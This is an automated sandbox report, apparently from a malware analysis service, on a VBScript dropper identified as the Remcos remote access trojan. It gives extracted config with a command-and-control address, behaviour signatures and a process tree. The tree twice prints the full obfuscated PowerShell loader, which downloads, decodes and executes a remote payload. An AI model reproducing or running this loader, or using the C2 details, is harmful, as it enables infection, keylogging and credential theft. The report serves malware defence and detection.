Overview

overview

10

Static

static

1

Reqt 83291.vbs

windows7-x64

10

Reqt 83291.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    11-12-2024 09:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Reqt 83291.vbs

  • Size

    63KB

  • MD5

    67552a3cc2641ad2c640148836475c97

  • SHA1

    c35ae8937bbd48525c521fdb33aef88a1399bec0

  • SHA256

    ef0695bdd5f43136be86281b48a318c29b7d18268cca5e1956eff46ee655f858

  • SHA512

    b257ea0bfc83e38242602ccdaf33260d7003992930e3d1215535976cd51490f9dff608ede093d3e390b079bda48bf0ede40cfe63c480794b40931d965fe8b08c

  • SSDEEP

    1536:c/tTURy7UcHIBKNgJSxnsUlJkCwkHKPncWf5:axUkZIBxAxs7KK/cWx

Score
10/10
remcosremotehostcollectiondiscoveryexecutionrat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

154.216.18.62:2404

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-D98D6X

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 6 IoCs
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Reqt 83291.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1712
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Tankningerne249='Knaldfilmens';;$Langspytsndsejling='Evoker180';;$Kommunikeg='Sortermuligheden';;$Assuranceselskabernes='Tinglysningskontorers';;$Rosalies=$host.Name;function Recheck($Norroy){If ($Rosalies) {$Nyvurderet='Centralforeningers';$Rigsdanskens=4} for ($Langspyts=$Rigsdanskens;;$Langspyts+=5){if(!$Norroy[$Langspyts]){$Rrflangerne++;break }$deponeringsbehovet+=$Norroy[$Langspyts];$Bibliotekaren='Trepaneringers'}$deponeringsbehovet}function Vedligeholdelsesvejledningerne148($Unlyrical){ .($Modeordet) ($Unlyrical)}$Caricature58=Recheck 'PrimnPeskeT tatImp .ElekW';$Caricature58+=Recheck 'ImmoeAsteBKin CSpecLF,ogIProdEschmnlastT';$Udhngstag=Recheck 'JuleMKonjo lazSubmiLon l pralS riaU,dd/';$Udbygningsplaner=Recheck 'InstT .thl NorsFort1Genn2';$Langspytsncursion='Cont[M,chNFat eCirctSem,.Va eSTermESundR afVSm siAlteCskr E,mpopSoiloSp,ci Un nAr,etIstamSokeAtracN CosAFedtg SupEWidoRCera]For :Over:S.ersm,diESkv c A bU,arlrSkvhiKoldTDittyPrimpConfrNoblOBivuTIdoloForbcVenuo ManlTstr=Kult$TrstuRaekDSpirbkjrsYGrovG HaknSch IAymaNKontGBetoSPljePA grLPultANiggn ejre eboR';$Udhngstag+=Recheck 'Prim5Aksi.Dato0Til. Nege(MangW CepiSavonV rkdShiroA.rawBidsspoli S ieNBlasT Mei Vali1Eng,0cifr.Otio0Ista;Soci NugaWSteriFormnNapa6Unho4 Bav;Hell SmlxKede6 Beq4Smle;Over KrerS,itv .yn:Div.1Unav3 Exi1Tryp.Va o0Cond)S jo Asl,G Pine Tenc ShekIndkoUdpo/Fi,r2Mult0 Fo,1No d0Firb0 Cow1fess0Fo,u1Affa LagF onri jarS ene aunfUlykoTr,lx pr /B.it1Lept3S.ra1Macr.Dagn0';$Terrestrialism=Recheck 'SnavUR.baSCatheT.gnr Mas- KonaMarrGlagrEFin,nT.taT';$Forewings138=Recheck 'SpalhGenot .tatOutqpOvers Ch :Unde/,air/HospoAutof N n1 undx ppi.CamaiPengc okuu Ast/ ablXFl,er UdsVkorsFPa tr skaZLevno Sc,K cya/ MetSGospkT.ero ForrForgt in e indrB,na.Li erOxheaUnk.r';$Langspytsnderzoner=Recheck 'Uroe>';$Modeordet=Recheck 'Be bIUnavEUkriX';$Opmuntringstalernes='Variolous';$Orchestiidae221='\Pestersome.Lin';Vedligeholdelsesvejledningerne148 (Recheck 'Skil$Uni GBidrlHil oStv,bDeceaMiljLDall:BimemhypeeCawnL,sona H,eNOpveT Hy hUdenyL,gh=Be y$YnglEGlutNinstVA vi:D.aga FemP Stiplysadi teARverTKlokaRome+Unfo$SteaO AborQuayCSp ohTillEUn uSPe itBikuIh noiEnerDCricAL kfe ace2R dg2Anic1');Vedligeholdelsesvejledningerne148 (Recheck 'bldd$Am hgK.isLeremoE tsbSe vA,eatL ehu: SpaaA.agflaegbSkorAHuskLSp,raVarinMegac U,fS gemnCorpR Cot=Draw$SmugfRefloButirMyt.eNonpWS gbIS,lanH ndgKoliSo in1Supe3 I.c8Ins,.Af,es nhypTracLOv riHexotVill(Ch l$ CallSkulaJemmnBethgsoulsIndvpP.ogYin ptPaavsAstrn eprDTandENonprS ndzU.daOPa tn rkrEUnglRTe p)');Vedligeholdelsesvejledningerne148 (Recheck $Langspytsncursion);$Forewings138=$Afbalancsnr[0];$Hunstiks=(Recheck ' ar$SuppG SqulKlemo B gBOverA ell ,ue:PensuAfgrpPrimPIndei Negt emiyUnknn arECoshsIncosAxon=UnmanMod EMelaWGo f-ExcaOKricB AfgJChloeC nscArcttLben OverSTn,eY FjasParfTC.ysE Cirmrema.Depr$AntiCSalaa onsrP rtICo dcmyrdAP ntt Vo,U GanRGimbeTank5Hirs8');Vedligeholdelsesvejledningerne148 ($Hunstiks);Vedligeholdelsesvejledningerne148 (Recheck 'Bnde$HoneU EmipudvapWashiRhestJubiy aignThaleCransGrapsTo c.N,niHModveFe laKontdE,eceUntirChems Mes[ a.l$SuffTSo.aeFiler DenrArbeeBorts OuttUnferSummi UndaC lolT.eti ubs HusmAl,o]Grye=Inde$VikaUDuchdInflh yhrnSprjgGingsStortMezea B.ng');$Strimmellser=Recheck 'Anko$SpreUAlumpTh.npDrapiSupetD mayPla,n Spie erasBilisBeta.PineDKjrso Se w,fginClo,lHereoD.kla Anid N nFSimoiT,phl Seme ask(Prot$UnchF OdioCatar J ne Attw UnsiHomonHu,hgovers Spo1V,lg3Exhi8Bes ,Avis$ P ts CaliPejenJenfdIgrabDiffiTredlHusmlmulteA red expeSelsrKa,dnGurseBugvsStav)';$sindbilledernes=$Melanthy;Vedligeholdelsesvejledningerne148 (Recheck 'Sp c$lyk GScalLr,aboBr.ab S iARickLEneb: .esOUncavE ecE NicRBegrp PaluShe B astL phaiReceCDo.m= Pla( ,estserieAfkaSWhizTSpec-UmleP C raDecaTexplh,jer Forl$HappsUncoi Sern.ypaDSoftBMiliiSautlA guLL moe A,tDA bnePerpRFastnLgtre anks Hul)');while (!$Overpublic) {Vedligeholdelsesvejledningerne148 (Recheck ' Saf$ anngSceplPnseo,letbCorta mpelD gl:Par RS,ksa datt esisahaobezen NoneZimmduds = dag$ utdp ndlRepraUnshgI miiEnsta RugrCanjiDattzSejpe dens') ;Vedligeholdelsesvejledningerne148 $Strimmellser;Vedligeholdelsesvejledningerne148 (Recheck ' C,msStu TSundAProsR mbet L m-EleksBragLbu lE T lEcoelPKbes Un o4');Vedligeholdelsesvejledningerne148 (Recheck 'Mole$ .ooGTun l mmeOHen.b IblANonrlunsh: FaloFeltVJetje ebr SkrpskoluImpubBanklpolyIGennCFist=rasp(PuncTRjseE anoSPlotTOper-S,depBnkeA BilTUdvihCaus Aftv$Jgers.uppiP laNin ed A rb D tiBl klYe,tlCur,eS ipdPolyeSlagRSkr nKoblEAfskSAlab)') ;Vedligeholdelsesvejledningerne148 (Recheck 'Sult$UnfrgT ndlUndeO.ncoBF ckAFosfLHema:Histn Ko oWhacNDattDFre,e ForC ColIPoi S SubITeksoVoluNTali=An.o$DelvGDigtlCrypOPneuBDa aa BoplSkol:Ca.mOpreeVDatoeNoncr GalsT toeEnthEUrogDCifrE BluDCa v+Spin+Padl%Trip$skrkAThe,F Na,b KilA FilLOpskaTowankulscFo lSGebynSnftr,all. Ls cUvanODegruAndrNForrT') ;$Forewings138=$Afbalancsnr[$Nondecision]}$Yverformer=279198;$Befordringsfradragene=31971;Vedligeholdelsesvejledningerne148 (Recheck 'Doll$H llgFo slUe.soAntibLeveAIcemlMart: UnhsBranP EnohJrenATylveAfr r ManOEnglsL vso AktMFoodeUtmm par= ut. s rG ArcEA owT D a-StniC,nluOVentNCordTStraE eawN LedTBeet Sara$KurssMut,iStepnScenD,locbStueiPharL r.fL KlaE.ongd Ob eStikr,remnGui,e nds');Vedligeholdelsesvejledningerne148 (Recheck 'Be,n$L.segBasilMe.eoSlamb Da aIatrlChl : B eAAggrt.ebet,nfrrTapeaEuphc Outt C eaSilkbT ielForbebal. Bril=sche depe[SpolSCummyBvresRo ptOv reSkr mInd .Ca,eC ox.o aspnSikkvm njeMiddrInddtEfte] Non:Min :T riFCordrTheroKoramSkarB D sa VolsAsc eCi,r6Unde4sideSKjrst DgnrDiagiVin.nI nigM.lm(Gyps$Tr,csEl cp OuthIncoaSarue TrarUnreoOversTireoalfam De eUnco)');Vedligeholdelsesvejledningerne148 (Recheck 'Outr$ kakg ErkL SoeO areb tedASkumL Acr:Luksc el.ODottlLovlOSpo,T ParoSystMKalmy age T ta=Ensi Poki[Creds dfy RetsLys tovareSelemInpu.StryTFriheliquXImprTG,at. SetESandnud.lc MedOGldeD,tevIcofoNQuotgSham] Irr: Fd :TaloaZ ofS,ovecThu,ITreaI Ket.PenigEft EKloktSh rSUnmitVlteRIntuIFo pnLut gBruj(Subp$Gu nAWedgt DisT Pl rOutfaEmpaCVindTValiaSol.bSudalGonaehaab)');Vedligeholdelsesvejledningerne148 (Recheck 'Co,f$ BomGAmbrL,ikvOAng bStanaAu oL Ol,:Un.aUForfDFuglbAw,klPalasGartEvarmRAuto=Band$FritcMa so BorlOst oB rgTGruno egem Un YVrks.HexasFiumuBewhBAndesOp etS,hlrLiegiJettNModeGUnta(He.d$UncoY Ex VK,viEJuggREftefPhotoverdRTrneM ButEPal,r C,n,Sk l$ vivBDiskeCib fcunnOnonarM.tzdinfaRTinsIDi,kn ilegHi asJo fFDecarGer AIndiD uglRMillA OveGHalveDiscn atEH,ve)');Vedligeholdelsesvejledningerne148 $Udblser;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:792
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Tankningerne249='Knaldfilmens';;$Langspytsndsejling='Evoker180';;$Kommunikeg='Sortermuligheden';;$Assuranceselskabernes='Tinglysningskontorers';;$Rosalies=$host.Name;function Recheck($Norroy){If ($Rosalies) {$Nyvurderet='Centralforeningers';$Rigsdanskens=4} for ($Langspyts=$Rigsdanskens;;$Langspyts+=5){if(!$Norroy[$Langspyts]){$Rrflangerne++;break }$deponeringsbehovet+=$Norroy[$Langspyts];$Bibliotekaren='Trepaneringers'}$deponeringsbehovet}function Vedligeholdelsesvejledningerne148($Unlyrical){ .($Modeordet) ($Unlyrical)}$Caricature58=Recheck 'PrimnPeskeT tatImp .ElekW';$Caricature58+=Recheck 'ImmoeAsteBKin CSpecLF,ogIProdEschmnlastT';$Udhngstag=Recheck 'JuleMKonjo lazSubmiLon l pralS riaU,dd/';$Udbygningsplaner=Recheck 'InstT .thl NorsFort1Genn2';$Langspytsncursion='Cont[M,chNFat eCirctSem,.Va eSTermESundR afVSm siAlteCskr E,mpopSoiloSp,ci Un nAr,etIstamSokeAtracN CosAFedtg SupEWidoRCera]For :Over:S.ersm,diESkv c A bU,arlrSkvhiKoldTDittyPrimpConfrNoblOBivuTIdoloForbcVenuo ManlTstr=Kult$TrstuRaekDSpirbkjrsYGrovG HaknSch IAymaNKontGBetoSPljePA grLPultANiggn ejre eboR';$Udhngstag+=Recheck 'Prim5Aksi.Dato0Til. Nege(MangW CepiSavonV rkdShiroA.rawBidsspoli S ieNBlasT Mei Vali1Eng,0cifr.Otio0Ista;Soci NugaWSteriFormnNapa6Unho4 Bav;Hell SmlxKede6 Beq4Smle;Over KrerS,itv .yn:Div.1Unav3 Exi1Tryp.Va o0Cond)S jo Asl,G Pine Tenc ShekIndkoUdpo/Fi,r2Mult0 Fo,1No d0Firb0 Cow1fess0Fo,u1Affa LagF onri jarS ene aunfUlykoTr,lx pr /B.it1Lept3S.ra1Macr.Dagn0';$Terrestrialism=Recheck 'SnavUR.baSCatheT.gnr Mas- KonaMarrGlagrEFin,nT.taT';$Forewings138=Recheck 'SpalhGenot .tatOutqpOvers Ch :Unde/,air/HospoAutof N n1 undx ppi.CamaiPengc okuu Ast/ ablXFl,er UdsVkorsFPa tr skaZLevno Sc,K cya/ MetSGospkT.ero ForrForgt in e indrB,na.Li erOxheaUnk.r';$Langspytsnderzoner=Recheck 'Uroe>';$Modeordet=Recheck 'Be bIUnavEUkriX';$Opmuntringstalernes='Variolous';$Orchestiidae221='\Pestersome.Lin';Vedligeholdelsesvejledningerne148 (Recheck 'Skil$Uni GBidrlHil oStv,bDeceaMiljLDall:BimemhypeeCawnL,sona H,eNOpveT Hy hUdenyL,gh=Be y$YnglEGlutNinstVA vi:D.aga FemP Stiplysadi teARverTKlokaRome+Unfo$SteaO AborQuayCSp ohTillEUn uSPe itBikuIh noiEnerDCricAL kfe ace2R dg2Anic1');Vedligeholdelsesvejledningerne148 (Recheck 'bldd$Am hgK.isLeremoE tsbSe vA,eatL ehu: SpaaA.agflaegbSkorAHuskLSp,raVarinMegac U,fS gemnCorpR Cot=Draw$SmugfRefloButirMyt.eNonpWS gbIS,lanH ndgKoliSo in1Supe3 I.c8Ins,.Af,es nhypTracLOv riHexotVill(Ch l$ CallSkulaJemmnBethgsoulsIndvpP.ogYin ptPaavsAstrn eprDTandENonprS ndzU.daOPa tn rkrEUnglRTe p)');Vedligeholdelsesvejledningerne148 (Recheck $Langspytsncursion);$Forewings138=$Afbalancsnr[0];$Hunstiks=(Recheck ' ar$SuppG SqulKlemo B gBOverA ell ,ue:PensuAfgrpPrimPIndei Negt emiyUnknn arECoshsIncosAxon=UnmanMod EMelaWGo f-ExcaOKricB AfgJChloeC nscArcttLben OverSTn,eY FjasParfTC.ysE Cirmrema.Depr$AntiCSalaa onsrP rtICo dcmyrdAP ntt Vo,U GanRGimbeTank5Hirs8');Vedligeholdelsesvejledningerne148 ($Hunstiks);Vedligeholdelsesvejledningerne148 (Recheck 'Bnde$HoneU EmipudvapWashiRhestJubiy aignThaleCransGrapsTo c.N,niHModveFe laKontdE,eceUntirChems Mes[ a.l$SuffTSo.aeFiler DenrArbeeBorts OuttUnferSummi UndaC lolT.eti ubs HusmAl,o]Grye=Inde$VikaUDuchdInflh yhrnSprjgGingsStortMezea B.ng');$Strimmellser=Recheck 'Anko$SpreUAlumpTh.npDrapiSupetD mayPla,n Spie erasBilisBeta.PineDKjrso Se w,fginClo,lHereoD.kla Anid N nFSimoiT,phl Seme ask(Prot$UnchF OdioCatar J ne Attw UnsiHomonHu,hgovers Spo1V,lg3Exhi8Bes ,Avis$ P ts CaliPejenJenfdIgrabDiffiTredlHusmlmulteA red expeSelsrKa,dnGurseBugvsStav)';$sindbilledernes=$Melanthy;Vedligeholdelsesvejledningerne148 (Recheck 'Sp c$lyk GScalLr,aboBr.ab S iARickLEneb: .esOUncavE ecE NicRBegrp PaluShe B astL phaiReceCDo.m= Pla( ,estserieAfkaSWhizTSpec-UmleP C raDecaTexplh,jer Forl$HappsUncoi Sern.ypaDSoftBMiliiSautlA guLL moe A,tDA bnePerpRFastnLgtre anks Hul)');while (!$Overpublic) {Vedligeholdelsesvejledningerne148 (Recheck ' Saf$ anngSceplPnseo,letbCorta mpelD gl:Par RS,ksa datt esisahaobezen NoneZimmduds = dag$ utdp ndlRepraUnshgI miiEnsta RugrCanjiDattzSejpe dens') ;Vedligeholdelsesvejledningerne148 $Strimmellser;Vedligeholdelsesvejledningerne148 (Recheck ' C,msStu TSundAProsR mbet L m-EleksBragLbu lE T lEcoelPKbes Un o4');Vedligeholdelsesvejledningerne148 (Recheck 'Mole$ .ooGTun l mmeOHen.b IblANonrlunsh: FaloFeltVJetje ebr SkrpskoluImpubBanklpolyIGennCFist=rasp(PuncTRjseE anoSPlotTOper-S,depBnkeA BilTUdvihCaus Aftv$Jgers.uppiP laNin ed A rb D tiBl klYe,tlCur,eS ipdPolyeSlagRSkr nKoblEAfskSAlab)') ;Vedligeholdelsesvejledningerne148 (Recheck 'Sult$UnfrgT ndlUndeO.ncoBF ckAFosfLHema:Histn Ko oWhacNDattDFre,e ForC ColIPoi S SubITeksoVoluNTali=An.o$DelvGDigtlCrypOPneuBDa aa BoplSkol:Ca.mOpreeVDatoeNoncr GalsT toeEnthEUrogDCifrE BluDCa v+Spin+Padl%Trip$skrkAThe,F Na,b KilA FilLOpskaTowankulscFo lSGebynSnftr,all. Ls cUvanODegruAndrNForrT') ;$Forewings138=$Afbalancsnr[$Nondecision]}$Yverformer=279198;$Befordringsfradragene=31971;Vedligeholdelsesvejledningerne148 (Recheck 'Doll$H llgFo slUe.soAntibLeveAIcemlMart: UnhsBranP EnohJrenATylveAfr r ManOEnglsL vso AktMFoodeUtmm par= ut. s rG ArcEA owT D a-StniC,nluOVentNCordTStraE eawN LedTBeet Sara$KurssMut,iStepnScenD,locbStueiPharL r.fL KlaE.ongd Ob eStikr,remnGui,e nds');Vedligeholdelsesvejledningerne148 (Recheck 'Be,n$L.segBasilMe.eoSlamb Da aIatrlChl : B eAAggrt.ebet,nfrrTapeaEuphc Outt C eaSilkbT ielForbebal. Bril=sche depe[SpolSCummyBvresRo ptOv reSkr mInd .Ca,eC ox.o aspnSikkvm njeMiddrInddtEfte] Non:Min :T riFCordrTheroKoramSkarB D sa VolsAsc eCi,r6Unde4sideSKjrst DgnrDiagiVin.nI nigM.lm(Gyps$Tr,csEl cp OuthIncoaSarue TrarUnreoOversTireoalfam De eUnco)');Vedligeholdelsesvejledningerne148 (Recheck 'Outr$ kakg ErkL SoeO areb tedASkumL Acr:Luksc el.ODottlLovlOSpo,T ParoSystMKalmy age T ta=Ensi Poki[Creds dfy RetsLys tovareSelemInpu.StryTFriheliquXImprTG,at. SetESandnud.lc MedOGldeD,tevIcofoNQuotgSham] Irr: Fd :TaloaZ ofS,ovecThu,ITreaI Ket.PenigEft EKloktSh rSUnmitVlteRIntuIFo pnLut gBruj(Subp$Gu nAWedgt DisT Pl rOutfaEmpaCVindTValiaSol.bSudalGonaehaab)');Vedligeholdelsesvejledningerne148 (Recheck 'Co,f$ BomGAmbrL,ikvOAng bStanaAu oL Ol,:Un.aUForfDFuglbAw,klPalasGartEvarmRAuto=Band$FritcMa so BorlOst oB rgTGruno egem Un YVrks.HexasFiumuBewhBAndesOp etS,hlrLiegiJettNModeGUnta(He.d$UncoY Ex VK,viEJuggREftefPhotoverdRTrneM ButEPal,r C,n,Sk l$ vivBDiskeCib fcunnOnonarM.tzdinfaRTinsIDi,kn ilegHi asJo fFDecarGer AIndiD uglRMillA OveGHalveDiscn atEH,ve)');Vedligeholdelsesvejledningerne148 $Udblser;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2928
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:2696
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\pvouragogzpoopkubvimmfoxq"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2996
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\apbfssqiuhhtqvgykgdnxrjozwhzk"
        3⤵
        • Accesses Microsoft Outlook accounts
        • System Location Discovery: System Language Discovery
        PID:2984
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\kjgxtlbkqpzyabukcqphawdxadzidcgi"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2864

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\pvouragogzpoopkubvimmfoxq
    Filesize

    2B

    MD5

    f3b25701fe362ec84616a93a45ce9998

    SHA1

    d62636d8caec13f04e28442a0a6fa1afeb024bbb

    SHA256

    b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

    SHA512

    98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UOJAOTL3MKUNVRON4DLZ.temp
    Filesize

    7KB

    MD5

    8ad66a57b7f4fec11c1716c1ba2386b1

    SHA1

    b3143856c921b9a4baa305a17dbc12a39c019178

    SHA256

    1440f93baaf10ad4583cc4152e2bb9d3ffb8d8f30e2824186d9a3c281fb9bcc1

    SHA512

    13e93162a87e6310687aa35a82454c25d8e20d92f88fe85365c2e24c44df023e8fdc451e0e07c0406e3d7d16d4c04c37bf6ba7463e3fcc5cb1f75630bfc02527

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Pestersome.Lin
    Filesize

    405KB

    MD5

    fea26dd912a1b2fbe245fb61cf1a2a1e

    SHA1

    73d2b3a141136b446104d6c92fb6f4f021fab924

    SHA256

    eed5fe194c635e8ad5871dcfee9aee934d2867a957d8cd047d73ea962a30ad89

    SHA512

    a995f95662a0d95c5624e39c53b60a3a039b46fa08b74ad44980da868a7defbd8483c39ab762a394e0c689c3d425c9f644920500ee407c003841ed34b99c8877

    Download Submit

  • memory/792-5-0x000000001B610000-0x000000001B8F2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/792-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/792-9-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/792-8-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/792-7-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/792-11-0x000007FEF638E000-0x000007FEF638F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/792-12-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/792-14-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/792-4-0x000007FEF638E000-0x000007FEF638F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2696-65-0x0000000007530000-0x0000000007549000-memory.dmp

    Filesize

    100KB

    Download

  • memory/2696-69-0x0000000000750000-0x00000000017B2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2696-76-0x0000000000750000-0x00000000017B2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2696-75-0x0000000000750000-0x00000000017B2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2696-74-0x0000000000750000-0x00000000017B2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2696-73-0x0000000000750000-0x00000000017B2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2696-72-0x0000000000750000-0x00000000017B2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2696-71-0x0000000000750000-0x00000000017B2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2696-70-0x0000000000750000-0x00000000017B2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2696-36-0x0000000000750000-0x00000000017B2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2696-68-0x0000000000750000-0x00000000017B2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2696-67-0x0000000000750000-0x00000000017B2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2696-66-0x0000000000750000-0x00000000017B2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2696-64-0x0000000007530000-0x0000000007549000-memory.dmp

    Filesize

    100KB

    Download

  • memory/2696-62-0x0000000007530000-0x0000000007549000-memory.dmp

    Filesize

    100KB

    Download

  • memory/2696-32-0x0000000000750000-0x00000000017B2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2864-54-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

    Download

  • memory/2864-55-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

    Download

  • memory/2864-51-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

    Download

  • memory/2864-52-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

    Download

  • memory/2928-18-0x00000000066B0000-0x000000000AD85000-memory.dmp

    Filesize

    70.8MB

    Download

  • memory/2984-42-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

    Download

  • memory/2984-45-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

    Download

  • memory/2984-47-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

    Download

  • memory/2984-49-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

    Download

  • memory/2996-44-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/2996-38-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2996-39-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/2996-40-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/2996-48-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download